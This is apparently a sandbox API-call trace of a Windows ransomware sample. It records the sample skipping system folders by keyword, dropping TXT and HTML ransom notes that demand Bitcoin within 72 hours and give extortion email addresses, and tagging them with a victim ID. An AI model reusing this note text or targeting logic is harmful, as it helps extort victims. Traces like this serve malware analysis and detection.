	[0176.207] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="boot") returned 0x0
	[0176.207] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.207] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="system volume information") returned 0x0
	[0176.207] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.207] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0176.208] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.208] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="temp") returned 0x0
	[0176.208] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.208] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="program files") returned 0x0
	[0176.208] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.208] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="program files (x86)") returned 0x0
	[0176.208] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.209] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="appdata") returned 0x0
	[0176.209] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.209] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="application data") returned 0x0
	[0176.209] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.209] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="winnt") returned 0x0
	[0176.209] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.209] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="tmp") returned 0x0
	[0176.209] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.210] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="cache") returned 0x0
	[0176.210] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.210] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="temporary internet files") returned 0x0
	[0176.210] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.210] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="webcache") returned 0x0
	[0176.210] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.210] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="inetcache") returned 0x0
	[0176.210] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.211] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="nvidia") returned 0x0
	[0176.211] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.211] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="packages") returned 0x0
	[0176.211] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.211] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="cookies") returned 0x0
	[0176.211] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.211] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="programdata") returned 0x0
	[0176.211] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0176.212] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0176.212] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x828e7429, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0176.212] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0176.212] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Applications", cAlternateFileName="APPLIC~1")) returned 1
	[0176.212] lstrcmpW (lpString1="Applications", lpString2="..") returned 1
	[0176.212] lstrcmpW (lpString1="Applications", lpString2=".") returned 1
	[0176.212] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data"
	[0176.212] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\"
	[0176.212] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\", lpString2="Applications" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications"
	[0176.213] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications"
	[0176.213] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\"
	[0176.213] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\"
	[0176.236] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*.*"
	[0176.236] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*.*" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0176.238] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*.*") returned 57
	[0176.238] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.239] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*.*", cchLength=0x39 | out: lpsz="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*") returned 0x39
	[0176.239] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.239] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="windows") returned 0x0
	[0176.239] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.239] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="boot") returned 0x0
	[0176.239] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.239] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="system volume information") returned 0x0
	[0176.239] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.240] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0176.240] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.240] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="temp") returned 0x0
	[0176.240] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.240] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="program files") returned 0x0
	[0176.240] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.240] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="program files (x86)") returned 0x0
	[0176.241] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.241] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="appdata") returned 0x0
	[0176.241] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.241] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="application data") returned 0x0
	[0176.241] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.241] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="winnt") returned 0x0
	[0176.241] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.241] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="tmp") returned 0x0
	[0176.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.242] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="cache") returned 0x0
	[0176.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.242] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="temporary internet files") returned 0x0
	[0176.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.242] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="webcache") returned 0x0
	[0176.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.242] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="inetcache") returned 0x0
	[0176.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.243] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="nvidia") returned 0x0
	[0176.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.243] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="packages") returned 0x0
	[0176.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.243] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="cookies") returned 0x0
	[0176.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.243] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="programdata") returned 0x0
	[0176.244] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0176.244] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x63dc6bf9, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63dc6bf9, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1
	[0176.244] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x63dc6bf9, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63dc6bf9, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0
	[0176.244] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0176.244] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0176.245] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications"
	[0176.246] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*.*"
	[0176.246] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.246] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.246] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\HELP_DECRYPT_YOUR_FILES.TXT") returned 81
	[0176.246] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0176.247] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0176.247] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0176.250] CloseHandle (hObject=0x390) returned 1
	[0176.250] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.250] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.250] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0176.252] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0176.252] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0176.252] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0176.252] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0176.252] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0176.253] CloseHandle (hObject=0x390) returned 1
	[0176.253] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.253] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.253] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0176.253] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\HELP_DECRYPT_YOUR_FILES.HTML") returned 82
	[0176.254] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0176.279] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0176.279] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0176.282] CloseHandle (hObject=0x390) returned 1
	[0176.282] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.282] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.283] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.283] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0176.284] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.284] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0176.284] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0176.284] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.285] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0176.285] CloseHandle (hObject=0x390) returned 1
	[0176.285] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*.*" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x829a60ad, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0176.285] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*.*") returned 57
	[0176.285] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.285] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*.*", cchLength=0x39 | out: lpsz="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*") returned 0x39
	[0176.286] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.286] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="windows") returned 0x0
	[0176.286] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.286] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="boot") returned 0x0
	[0176.286] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.286] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="system volume information") returned 0x0
	[0176.286] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.287] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0176.287] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.287] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="temp") returned 0x0
	[0176.287] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.287] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="program files") returned 0x0
	[0176.287] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.287] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="program files (x86)") returned 0x0
	[0176.287] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.288] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="appdata") returned 0x0
	[0176.288] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.288] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="application data") returned 0x0
	[0176.288] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.288] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="winnt") returned 0x0
	[0176.288] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.288] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="tmp") returned 0x0
	[0176.289] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.289] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="cache") returned 0x0
	[0176.289] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.289] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="temporary internet files") returned 0x0
	[0176.289] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.289] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="webcache") returned 0x0
	[0176.289] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.290] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="inetcache") returned 0x0
	[0176.290] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.290] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="nvidia") returned 0x0
	[0176.290] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.290] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="packages") returned 0x0
	[0176.290] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.290] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\applications\\*.*", lpSrch="cookies") returned 0x0
